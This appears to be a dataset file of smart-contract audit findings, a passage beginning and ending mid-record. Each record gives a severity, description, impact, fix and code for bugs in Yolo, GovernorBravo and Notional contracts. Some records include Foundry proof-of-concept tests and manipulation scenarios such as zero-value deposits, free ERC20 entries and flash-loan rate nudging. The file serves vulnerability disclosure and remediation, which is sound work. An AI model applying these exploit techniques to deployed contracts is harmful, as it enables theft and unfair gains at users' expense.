migrates to B2.\\nBob's stake is stacked on top of B2. B2 becomes the new validator address, but their stake has exceeded `validatorMaxStake`.\\nB2 can then repeated this procedure to addresses B3, B4, ..., despite B2 already holding more than the max allowed amount.\\nBob now holds more stake than he should be able to, allowing him to earn an unfair amount of rewards compared to other validators.\\nWe also note that, even if the admin tries to freeze Bob, he can front-run the freeze with an unstake, since unstakes are not blocked from withdrawing (after cooldown ends).чCheck that the new address's total stake does not exceed `validatorMaxStake` before proceeding with the migration.чBreaking an important invariant of the protocol.\\nAllowing any validator to bypass the max stake amount. In turn allows them to earn an unfair amount of validator rewards in the process.\\nAllows a validator to unfairly increase their max delegator amount, as an effect of increasing `(validator stake) * maxCapMultiplier`.ч```\\nfunction setValidatorAddress(uint128 validatorId, address newAddress) external whenNotPaused {\\n // // rest of code\\n v.stakings[newAddress].shares += v.stakings[msg.sender].shares;\\n v.stakings[newAddress].staked += v.stakings[msg.sender].staked;\\n delete v.stakings[msg.sender];\\n // // rest of code\\n}\\n```\\n -Nobody can cast for any proposalчmediumч```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n function castVoteInternal(\\n address voter,\\n uint256 proposalId,\\n uint8 support\\n ) internal returns (uint256) {\\n// rest of code// rest of code\\n // Get the user's votes at the start of the proposal and at the time of voting. Take the minimum.\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:-> uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n// rest of code// rest of code\\n }\\n```\\n\\n```\\nfunction getPriorVotes(address account, uint256 blockNumber) external view returns (uint256) {\\n-> require(blockNumber < block.number, \"gOHM::getPriorVotes: not yet determined\");\\n// rest of code// rest of code\\n }\\n```\\n\\nTherefore, L446 will always revert. Voting will not be possible.\\nCopy the coded POC below to one project from Foundry and run `forge test -vvv` to prove this issue.ч```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:- uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n446:+ uint256 currentVotes = gohm.getPriorVotes(voter, block.number - 1);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n```\\n\\n чNobody can cast for any proposal. Not being able to vote means the entire governance contract will be useless. Core functionality is broken.ч```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n function castVoteInternal(\\n address voter,\\n uint256 proposalId,\\n uint8 support\\n ) internal returns (uint256) {\\n// rest of code// rest of code\\n // Get the user's votes at the start of the proposal and at the time of voting. Take the minimum.\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:-> uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n// rest of code// rest of code\\n }\\n```\\n -User can get free entries if the price of any whitelisted ERC20 token is greater than the round's `valuePerEntry`чhighчLack of explicit separation between ERC20 and ERC721 deposits allows users to gain free entries for any round given there exists a whitelisted ERC20 token with price greater than the round's `valuePerEntry`.\\n```\\n if (isCurrencyAllowed[tokenAddress] != 1) {\\n revert InvalidCollection();\\n }\\n```\\n\\n```\\n if (singleDeposit.tokenType == YoloV2__TokenType.ERC721) {\\n if (price == 0) {\\n price = _getReservoirPrice(singleDeposit);\\n prices[tokenAddress][roundId] = price;\\n }\\n```\\n\\n```\\n uint256 entriesCount = price / round.valuePerEntry;\\n if (entriesCount == 0) {\\n revert InvalidValue();\\n }\\n```\\n\\n```\\n } else if (tokenType == TokenType.ERC721) {\\n for (uint256 j; j < itemIdsLengthForSingleCollection; ) {\\n // rest of code\\n _executeERC721TransferFrom(items[i].tokenAddress, from, to, itemIds[j]);\\n```\\n\\n```\\n function _executeERC721TransferFrom(address collection, address from, address to, uint256 tokenId) internal {\\n // rest of code\\n (bool status, ) = collection.call(abi.encodeCall(IERC721.transferFrom, (from, to, tokenId)));\\n // rest of code\\n }\\n```\\n\\nThe function signature of `transferFrom` for ERC721 and ERC20 is identical, so this will call `transferFrom` on the ERC20 contract with `amount = 0` (since 'token ids' specified in `singleDeposit.tokenIdsOrAmounts` are all 0). Consequently, the user pays nothing and the transaction executes successfully (as long as the ERC20 token does not revert on zero transfers).\\nPaste the test below into `Yolo.deposit.t.sol` with `forge-std/console.sol` imported. It demonstrates a user making 3 free deposits (in the same transaction) using the MKR token (ie. with zero MKR balance). The token used can be substituted with any token with price > `valuePerEntry = 0.01 ETH` (which is non-rebasing/non-taxable and has sufficient liquidity in their /ETH Uniswap v3 pool as specified in the README).\\nчWhitelist tokens using both the token address and the token type (ERC20/ERC721).чUsers can get an arbitrary number of entries into rounds for free (which should generally allow them to significantly increase their chances of winning). In the case the winner is a free depositor, they will end up with the same profit as if they participated normally since they have to pay the fee over the total value of the deposits (which includes the price of their free deposits). If the winner is an honest depositor, they still have to pay the full fee including the free entries, but they are unable to claim the value for the free entries (since the `tokenId` (or amount) is zero). They earn less profit than if everyone had participated honestly.ч```\\n if (isCurrencyAllowed[tokenAddress] != 1) {\\n revert InvalidCollection();\\n }\\n```\\n -Users can deposit \"0\" ether to any roundчhighчThe main invariant to determine the winner is that the indexes must be in ascending order with no repetitions. Therefore, depositing \"0\" is strictly prohibited as it does not increase the index. However, there is a method by which a user can easily deposit \"0\" ether to any round without any extra costs than gas.\\nAs stated in the summary, depositing \"0\" will not increment the entryIndex, leading to a potential issue with the indexes array. This, in turn, may result in an unfair winner selection due to how the upper bound is determined in the array. The relevant code snippet illustrating this behavior is found here.\\nLet's check the following code snippet in the `depositETHIntoMultipleRounds` function\\n```\\nfor (uint256 i; i < numberOfRounds; ++i) {\\n uint256 roundId = _unsafeAdd(startingRoundId, i);\\n Round storage round = rounds[roundId];\\n uint256 roundValuePerEntry = round.valuePerEntry;\\n if (roundValuePerEntry == 0) {\\n (, , roundValuePerEntry) = _writeDataToRound({roundId: roundId, roundValue: 0});\\n }\\n\\n _incrementUserDepositCount(roundId, round);\\n\\n // @review depositAmount can be \"0\"\\n uint256 depositAmount = amounts[i];\\n\\n // @review 0 % ANY_NUMBER = 0\\n if (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n uint256 entriesCount = _depositETH(round, roundId, roundValuePerEntry, depositAmount);\\n expectedValue += depositAmount;\\n\\n entriesCounts[i] = entriesCount;\\n }\\n\\n // @review will not fail as long as user deposits normally to 1 round\\n // then he can deposit to any round with \"0\" amounts\\n if (expectedValue != msg.value) {\\n revert InvalidValue();\\n }\\n```\\n\\nas we can see in the above comments added by me starting with \"review\" it explains how its possible. As long as user deposits normally to 1 round then he can also deposit \"0\" amounts to any round because the `expectedValue` will be equal to msg.value.\\nTextual PoC: Assume Alice sends the tx with 1 ether as msg.value and \"amounts\" array as [1 ether, 0, 0]. first time the loop starts the 1 ether will be correctly evaluated in to the round. When the loop starts the 2nd and 3rd iterations it won't revert because the following code snippet will be \"0\" and adding 0 to `expectedValue` will not increment to `expectedValue` so the msg.value will be exactly same with the `expectedValue`.\\n```\\nif (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n```\\n\\nCoded PoC (copy the test to `Yolo.deposit.sol` file and run the test):\\n```\\nfunction test_deposit0ToRounds() external {\\n vm.deal(user2, 1 ether);\\n vm.deal(user3, 1 ether);\\n\\n // @dev first round starts normally\\n vm.prank(user2);\\n yolo.deposit{value: 1 ether}(1, _emptyDepositsCalldata());\\n\\n // @dev user3 will deposit 1 ether to the current round(1) and will deposit\\n // 0,0 to round 2 and round3\\n uint256[] memory amounts = new uint256[](3);\\n amounts[0] = 1 ether;\\n amounts[1] = 0;\\n amounts[2] = 0;\\n vm.prank(user3);\\n yolo.depositETHIntoMultipleRounds{value: 1 ether}(amounts);\\n\\n // @dev check user3 indeed managed to deposit 0 ether to round2\\n IYoloV2.Deposit[] memory deposits = _getDeposits(2);\\n assertEq(deposits.length, 1);\\n IYoloV2.Deposit memory deposit = deposits[0];\\n assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH));\\n assertEq(deposit.tokenAddress, address(0));\\n assertEq(deposit.tokenId, 0);\\n assertEq(deposit.tokenAmount, 0);\\n assertEq(deposit.depositor, user3);\\n assertFalse(deposit.withdrawn);\\n assertEq(deposit.currentEntryIndex, 0);\\n\\n // @dev check user3 indeed managed to deposit 0 ether to round3\\n deposits = _getDeposits(3);\\n assertEq(deposits.length, 1);\\n deposit = deposits[0];\\n assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH));\\n assertEq(deposit.tokenAddress, address(0));\\n assertEq(deposit.tokenId, 0);\\n assertEq(deposit.tokenAmount, 0);\\n assertEq(deposit.depositor, user3);\\n assertFalse(deposit.withdrawn);\\n assertEq(deposit.currentEntryIndex, 0);\\n }\\n```\\nчAdd the following check inside the depositETHIntoMultipleRounds function\\n```\\nif (depositAmount == 0) {\\n revert InvalidValue();\\n }\\n```\\nчHigh, since it will alter the games winner selection and it is very cheap to perform the attack.ч```\\nfor (uint256 i; i < numberOfRounds; ++i) {\\n uint256 roundId = _unsafeAdd(startingRoundId, i);\\n Round storage round = rounds[roundId];\\n uint256 roundValuePerEntry = round.valuePerEntry;\\n if (roundValuePerEntry == 0) {\\n (, , roundValuePerEntry) = _writeDataToRound({roundId: roundId, roundValue: 0});\\n }\\n\\n _incrementUserDepositCount(roundId, round);\\n\\n // @review depositAmount can be \"0\"\\n uint256 depositAmount = amounts[i];\\n\\n // @review 0 % ANY_NUMBER = 0\\n if (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n uint256 entriesCount = _depositETH(round, roundId, roundValuePerEntry, depositAmount);\\n expectedValue += depositAmount;\\n\\n entriesCounts[i] = entriesCount;\\n }\\n\\n // @review will not fail as long as user deposits normally to 1 round\\n // then he can deposit to any round with \"0\" amounts\\n if (expectedValue != msg.value) {\\n revert InvalidValue();\\n }\\n```\\n -The number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUNDчmediumчThe number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, because there is no such check in depositETHIntoMultipleRounds() function or rolloverETH() function.\\ndepositETHIntoMultipleRounds() function is called to deposit ETH into multiple rounds, so it's possible that the number of deposits in both current round and next round is MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.\\nWhen current round's number of deposits reaches MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, the round is drawn:\\n```\\n if (\\n _shouldDrawWinner(\\n startingRound.numberOfParticipants,\\n startingRound.maximumNumberOfParticipants,\\n startingRound.deposits.length\\n )\\n ) {\\n _drawWinner(startingRound, startingRoundId);\\n }\\n```\\n\\n_drawWinner() function calls VRF provider to get a random number, when the random number is returned by VRF provider, fulfillRandomWords() function is called to chose the winner and the next round will be started:\\n```\\n _startRound({_roundsCount: roundId});\\n```\\n\\nIf the next round's deposit number is also MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, _startRound() function may also draw the next round as well, so it seems that there is no chance the the number of deposits in a round can become larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:\\n```\\n if (\\n !paused() &&\\n _shouldDrawWinner(numberOfParticipants, round.maximumNumberOfParticipants, round.deposits.length)\\n ) {\\n _drawWinner(round, roundId);\\n }\\n```\\n\\nHowever, _startRound() function will draw the round only if the protocol is not paused. Imagine the following scenario:\\nThe deposit number in `round 1` and `round 2` is MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND;\\n`round 1` is drawn, before random number is sent back by VRF provider, the protocol is paused by the admin for some reason;\\nRandom number is returned and fulfillRandomWords() function is called to start round 2;\\nBecause protocol is paused, `round 2` is set to OPEN but not drawn;\\nLater admin unpauses the protocol, before drawWinner() function can be called, some users may deposit more funds into `round 2` by calling depositETHIntoMultipleRounds() function or rolloverETH() function, this will make the deposit number of `round 2` larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.\\nPlease run the test code to verify:\\n```\\n function test_audit_deposit_more_than_max() public {\\n address alice = makeAddr(\"Alice\");\\n address bob = makeAddr(\"Bob\");\\n\\n vm.deal(alice, 2 ether);\\n vm.deal(bob, 2 ether);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 0.01 ether;\\n amounts[1] = 0.01 ether;\\n\\n // Users deposit to make the deposit number equals to MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND in both rounds\\n uint256 MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND = 100;\\n for (uint i; i < MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND / 2; ++i) {\\n vm.prank(alice);\\n yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts);\\n\\n vm.prank(bob);\\n yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts);\\n }\\n\\n // owner pause the protocol before random word returned\\n vm.prank(owner);\\n yolo.togglePaused();\\n\\n // random word returned and round 2 is started but not drawn\\n vm.prank(VRF_COORDINATOR);\\n uint256[] memory randomWords = new uint256[](1);\\n uint256 randomWord = 123;\\n randomWords[0] = randomWord;\\n yolo.rawFulfillRandomWords(FULFILL_RANDOM_WORDS_REQUEST_ID, randomWords);\\n\\n // owner unpause the protocol\\n vm.prank(owner);\\n yolo.togglePaused();\\n\\n // User deposits into round 2\\n amounts = new uint256[](1);\\n amounts[0] = 0.01 ether;\\n vm.prank(bob);\\n yolo.depositETHIntoMultipleRounds{value: 0.01 ether}(amounts);\\n\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n YoloV2.Deposit[] memory round2Deposits\\n ) = yolo.getRound(2);\\n\\n // the number of deposits in round 2 is larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND\\n assertEq(round2Deposits.length, MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND + 1);\\n }\\n```\\nчAdd check in _depositETH() function which is called by both depositETHIntoMultipleRounds() function and rolloverETH() function to ensure the deposit number cannot be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:\\n```\\n uint256 roundDepositCount = round.deposits.length;\\n\\n// Add the line below\\n if (roundDepositCount >= MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND) {\\n// Add the line below\\n revert MaximumNumberOfDepositsReached();\\n// Add the line below\\n }\\n\\n _validateOnePlayerCannotFillUpTheWholeRound(_unsafeAdd(roundDepositCount, 1), round.numberOfParticipants);\\n```\\nчThis issue break the invariant that the number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.ч```\\n if (\\n _shouldDrawWinner(\\n startingRound.numberOfParticipants,\\n startingRound.maximumNumberOfParticipants,\\n startingRound.deposits.length\\n )\\n ) {\\n _drawWinner(startingRound, startingRoundId);\\n }\\n```\\n -Low precision is used when checking spot price deviationчmediumчLow precision is used when checking spot price deviation, which might lead to potential manipulation or create the potential for an MEV opportunity due to valuation discrepancy.\\nAssume the following:\\nThe max deviation is set to 1%\\n`nTokenOracleValue` is 1,000,000,000\\n`nTokenSpotValue` is 980,000,001\\n```\\nFile: Constants.sol\\n // Basis for percentages\\n int256 internal constant PERCENTAGE_DECIMALS = 100;\\n```\\n\\n```\\nFile: nTokenCalculations.sol\\n int256 maxValueDeviationPercent = int256(\\n uint256(uint8(nToken.parameters[Constants.MAX_MINT_DEVIATION_LIMIT]))\\n );\\n // Check deviation limit here\\n int256 deviationInPercentage = nTokenOracleValue.sub(nTokenSpotValue).abs()\\n .mul(Constants.PERCENTAGE_DECIMALS).div(nTokenOracleValue);\\n require(deviationInPercentage <= maxValueDeviationPercent, \"Over Deviation Limit\");\\n```\\n\\nBased on the above formula:\\n```\\nnTokenOracleValue.sub(nTokenSpotValue).abs().mul(Constants.PERCENTAGE_DECIMALS).div(nTokenOracleValue);\\n((nTokenOracleValue - nTokenSpotValue) * Constants.PERCENTAGE_DECIMALS) / nTokenOracleValue\\n((1,000,000,000 - 980,000,001) * 100) / 1,000,000,000\\n(19,999,999 * 100) / 1,000,000,000\\n1,999,999,900 / 1,000,000,000 = 1.9999999 = 1\\n```\\n\\nThe above shows that the oracle and spot values have deviated by 1.99999%, which is close to 2%. However, due to a rounding error, it is rounded down to 1%, and the TX will not revert.чConsider increasing the precision.\\nFor instance, increasing the precision from `Constants.PERCENTAGE_DECIMALS` (100) to 1e8 would have caught the issue mentioned earlier in the report even after the rounding down.\\n```\\nnTokenOracleValue.sub(nTokenSpotValue).abs().mul(1e8).div(nTokenOracleValue);\\n((nTokenOracleValue - nTokenSpotValue) * 1e8) / nTokenOracleValue\\n((1,000,000,000 - 980,000,001) * 1e8) / 1,000,000,000\\n(19,999,999 * 1e8) / 1,000,000,000 = 1999999.9 = 1999999\\n```\\n\\n1% of 1e8 = 1000000\\n```\\nrequire(deviationInPercentage <= maxValueDeviationPercent, \"Over Deviation Limit\")\\nrequire(1999999 <= 1000000, \"Over Deviation Limit\") => Revert\\n```\\nчThe purpose of the deviation check is to ensure that the spot market value is not manipulated. If the deviation check is not accurate, it might lead to potential manipulation or create the potential for an MEV opportunity due to valuation discrepancy.ч```\\nFile: Constants.sol\\n // Basis for percentages\\n int256 internal constant PERCENTAGE_DECIMALS = 100;\\n```\\n -The use of spot data when discounting is subjected to manipulationчmediumчThe use of spot data when discounting is subjected to manipulation. As a result, malicious users could receive more cash than expected during redemption by performing manipulation. Since this is a zero-sum, the attacker's gain is the protocol loss.\\nWhen redeeming wfCash before maturity, the `_sellfCash` function will be executed.\\nAssume that there is insufficient fCash left on the wrapper to be sold back to the Notional AMM. In this case, the `getPrincipalFromfCashBorrow` view function will be used to calculate the number of prime cash to be withdrawn for a given fCash amount and sent to the users.\\nNote that the `getPrincipalFromfCashBorrow` view function uses the spot data (spot interest rate, spot utilization, spot totalSupply/totalDebt, etc.) internally when computing the prime cash to be withdrawn for a given fCash. Thus, it is subjected to manipulation.\\n```\\nFile: wfCashLogic.sol\\n /// @dev Sells an fCash share back on the Notional AMM\\n function _sellfCash(\\n address receiver,\\n uint256 fCashToSell,\\n uint32 maxImpliedRate\\n ) private returns (uint256 tokensTransferred) {\\n (IERC20 token, bool isETH) = getToken(true); \\n uint256 balanceBefore = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n uint16 currencyId = getCurrencyId(); \\n\\n (uint256 initialCashBalance, uint256 fCashBalance) = getBalances(); \\n bool hasInsufficientfCash = fCashBalance < fCashToSell; \\n\\n uint256 primeCashToWithdraw; \\n if (hasInsufficientfCash) {\\n // If there is insufficient fCash, calculate how much prime cash would be purchased if the\\n // given fCash amount would be sold and that will be how much the wrapper will withdraw and\\n // send to the receiver. Since fCash always sells at a discount to underlying prior to maturity,\\n // the wrapper is guaranteed to have sufficient cash to send to the account.\\n (/* */, primeCashToWithdraw, /* */, /* */) = NotionalV2.getPrincipalFromfCashBorrow( \\n currencyId,\\n fCashToSell, \\n getMaturity(),\\n 0, \\n block.timestamp\\n ); \\n // If this is zero then it signifies that the trade will fail.\\n require(primeCashToWithdraw > 0, \"Redeem Failed\"); \\n\\n // Re-write the fCash to sell to the entire fCash balance.\\n fCashToSell = fCashBalance;\\n }\\n```\\n\\nWithin the `CalculationViews.getPrincipalFromfCashBorrow` view function, it will rely on the `InterestRateCurve.calculatefCashTrade` function to compute the cash to be returned based on the current interest rate model.\\nAssume that the current utilization rate is slightly above Kink 1. When Bob redeems his wfCash, the interest rate used falls within the gentle slope between Kink 1 and Kink 2. Let the interest rate based on current utilization be 4%. The amount of fCash will be discounted back with 4% interest rate to find out the cash value (present value) and the returned value is $x$.\\nObserved that before Kink 1, the interest rate changed sharply. If one could nudge the utilization toward the left (toward zero) and cause the utilization to fall between Kink 0 and Kink 1, the interest rate would fall sharply. Since the utilization is computed as on `utilization = totalfCash/totalCashUnderlying`, one could deposit prime cash to the market to increase the denominator (totalCashUnderlying) to bring down the utilization rate.\\nBob deposits a specific amount of prime cash (either by its own funds or flash-loan) to reduce the utilization rate, which results in a reduction in interest rate. Assume that the interest rate reduces to 1.5%. The amount of fCash will be discounted with a lower interest rate of 1.5%, which will result in higher cash value, and the returned value/received cash is $y$.\\n$y > x$. So Bob received $y - x$ more cash compared to if he had not performed the manipulation. Since this is a zero-sum, Bob's gain is the protocol loss.\\nчAvoid using spot data when computing the amount of assets that the user is entitled to during redemption. Consider using a TWAP/Time-lagged oracle to guard against potential manipulation.чMalicious users could receive more cash than expected during redemption by performing manipulation. Since this is a zero-sum, the attacker's gain is the protocol loss.ч```\\nFile: wfCashLogic.sol\\n /// @dev Sells an fCash share back on the Notional AMM\\n function _sellfCash(\\n address receiver,\\n uint256 fCashToSell,\\n uint32 maxImpliedRate\\n ) private returns (uint256 tokensTransferred) {\\n (IERC20 token, bool isETH) = getToken(true); \\n uint256 balanceBefore = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n uint16 currencyId = getCurrencyId(); \\n\\n (uint256 initialCashBalance, uint256 fCashBalance) = getBalances(); \\n bool hasInsufficientfCash = fCashBalance < fCashToSell; \\n\\n uint256 primeCashToWithdraw; \\n if (hasInsufficientfCash) {\\n // If there is insufficient fCash, calculate how much prime cash would be purchased if the\\n // given fCash amount would be sold and that will be how much the wrapper will withdraw and\\n // send to the receiver. Since fCash always sells at a discount to underlying prior to maturity,\\n // the wrapper is guaranteed to have sufficient cash to send to the account.\\n (/* */, primeCashToWithdraw, /* */, /* */) = NotionalV2.getPrincipalFromfCashBorrow( \\n currencyId,\\n fCashToSell, \\n getMaturity(),\\n 0, \\n block.timestamp\\n ); \\n // If this is zero then it signifies that the trade will fail.\\n require(primeCashToWithdraw > 0, \"Redeem Failed\"); \\n\\n // Re-write the fCash to sell to the entire fCash balance.\\n fCashToSell = fCashBalance;\\n }\\n```\\n -External lending can exceed the thresholdчmediumчDue to an incorrect calculation of the max lending amount, external lending can exceed the external withdrawal threshold. If this restriction/threshold is not adhered to, users or various core functionalities within the protocol will have issues redeeming or withdrawing their prime cash.\\nThe following is the extract from the Audit Scope Documentation provided by the protocol team on the contest page that describes the external withdraw threshold:\\n● External Withdraw Threshold: ensures that Notional has sufficient liquidity to withdraw from an external lending market. If Notional has 1000 units of underlying lent out on Aave, it requires 1000 * externalWithdrawThreshold units of underlying to be available on Aave for withdraw. This ensures there is sufficient buffer to process the redemption of Notional funds. If available liquidity on Aave begins to drop due to increased utilization, Notional will automatically begin to withdraw its funds from Aave to ensure that they are available for withdrawal on Notional itself.\\nTo ensure the redeemability of Notional's funds on external lending markets, Notional requires there to be redeemable funds on the external lending market that are a multiple of the funds that Notional has lent on that market itself.\\nAssume that the `externalWithdrawThreshold` is 200% and the underlying is USDC. Therefore, `PERCENTAGE_DECIMALS/externalWithdrawThreshold = 100/200 = 0.5` (Line 83-84 below). This means that the number of USDC to be available on AAVE for withdrawal must be two (2) times the number of USDC Notional lent out on AAVE (A multiple of 2).\\nThe `externalUnderlyingAvailableForWithdraw` stores the number of liquidity in USDC on the AAVE pool available to be withdrawn.\\nIf `externalUnderlyingAvailableForWithdraw` is 1000 USDC and `currentExternalUnderlyingLend` is 400 USDC, this means that the remaining 600 USDC liquidity on the AAVE pool is not owned by Notional.\\nThe `maxExternalUnderlyingLend` will be `600 * 0.5 = 300`. Thus, the maximum amount that Notional can lend externally at this point is 300 USDC.\\nAssume that after Notional has lent 300 USDC externally to the AAVE pool.\\nThe `currentExternalUnderlyingLend` will become `400+300=700`, and the `externalUnderlyingAvailableForWithdraw` will become `1000+300=1300`\\nFollowing is the percentage of USDC in AAVE that belong to Notional\\n```\\n700/1300 = 0.5384615385 (53%).\\n```\\n\\nAt this point, the invariant is broken as the number of USDC to be available on AAVE for withdrawal is less than two (2) times the number of USDC lent out on AAVE after the lending.\\n```\\nFile: ExternalLending.sol\\n function getTargetExternalLendingAmount(\\n..SNIP..\\n uint256 maxExternalUnderlyingLend;\\n if (oracleData.currentExternalUnderlyingLend < oracleData.externalUnderlyingAvailableForWithdraw) {\\n maxExternalUnderlyingLend =\\n (oracleData.externalUnderlyingAvailableForWithdraw - oracleData.currentExternalUnderlyingLend)\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS))\\n .div(rebalancingTargetData.externalWithdrawThreshold);\\n } else {\\n maxExternalUnderlyingLend = 0;\\n }\\n```\\n\\nThe root cause is that when USDC is deposited to AAVE to get aUSDC, the total USDC in the pool increases. Therefore, using the current amount of USDC in the pool to determine the maximum deposit amount is not an accurate measure of liquidity risk.чTo ensure that a deposit does not exceed the threshold, the following formula should be used to determine the maximum deposit amount:\\nLet's denote:\\n$T$ as the externalWithdrawThreshold $L$ as the currentExternalUnderlyingLend $W$ as the externalUnderlyingAvailableForWithdraw $D$ as the Deposit (the variable we want to solve for)\\n$$ T = \\frac{L + D}{W + D} $$\\nSolving $D$, the formula for calculating the maximum deposit ($D$) is\\n$$ D = \\frac{TW-L}{1-T} $$\\nUsing back the same example in the \"Vulnerability Detail\" section.\\nThe maximum deposit amount is as follows:\\n```\\nD = (TW - L) / (1 - T)\\nD = (0.5 * 1000 - 400) / (1 - 0.5)\\nD = (500 - 400) / 0.5 = 200\\n```\\n\\nIf 200 USDC is lent out, it will still not exceed the threshold of 200%, which demonstrates that the formula is working as intended in keeping the multiple of two (200%) constant before and after the deposit.\\n```\\n(400 + 200) / (1000 + 200) = 0.5\\n```\\nчTo ensure the redeemability of Notional's funds on external lending markets, Notional requires there to be redeemable funds on the external lending market that are a multiple of the funds that Notional has lent on that market itself.\\nIf this restriction is not adhered to, users or various core functionalities within the protocol will have issues redeeming or withdrawing their prime cash. For instance, users might not be able to withdraw their assets from the protocol due to insufficient liquidity, or liquidation cannot be carried out due to lack of liquidity, resulting in bad debt accumulating within the protocol and negatively affecting the protocol's solvency.ч```\\n700/1300 = 0.5384615385 (53%).\\n```\\n -Rebalance will be delayed due to revertчmediumчThe rebalancing of unhealthy currencies will be delayed due to a revert, resulting in an excess of liquidity being lent out in the external market. This might affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation having issues executed due to insufficient liquidity.\\nAssume that Notional supports 5 currencies ($A, B, C, D, E$), and the Gelato bot is configured to call the `checkRebalance` function every 30 minutes.\\nAssume that the current market condition is volatile. Thus, the inflow and outflow of assets to Notional, utilization rate, and available liquidity at AAVE change frequently. As a result, the target amount that should be externally lent out also changes frequently since the computation of this value relies on the spot market information.\\nAt T1, when the Gelato bot calls the `checkRebalance()` view function, it returns that currencies $A$, $B$, and $C$ are unhealthy and need to be rebalanced.\\nShortly after receiving the execution payload from the `checkRebalance()`, the bot submits the rebalancing TX to the mempool for execution at T2.\\nWhen the rebalancing TX is executed at T3, one of the currencies (Currency $A$) becomes healthy. As a result, the require check at Line 326 will revert and the entire rebalancing transaction will be cancelled. Thus, currencies $B$ and $C$ that are still unhealthy at this point will not be rebalanced.\\nIf this issue occurs frequently or repeatedly over a period of time, the rebalancing of unhealthy currencies will be delayed.\\n```\\nFile: TreasuryAction.sol\\n function _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy); \\n```\\nчIf one of the currencies becomes healthy when the rebalance TX is executed, consider skipping this currency and move on to execute the rebalance on the rest of the currencies that are still unhealthy.\\n```\\nfunction _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n// Remove the line below\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy);\\n// Add the line below\\n if (useCooldownCheck && !hasCooldownPassed && !isExternalLendingUnhealthy) return;\\n```\\nчThe rebalancing of unhealthy currencies will be delayed, resulting in an excess of liquidity being lent out to the external market. This might affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation having issues executed due to insufficient liquidity.ч```\\nFile: TreasuryAction.sol\\n function _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing 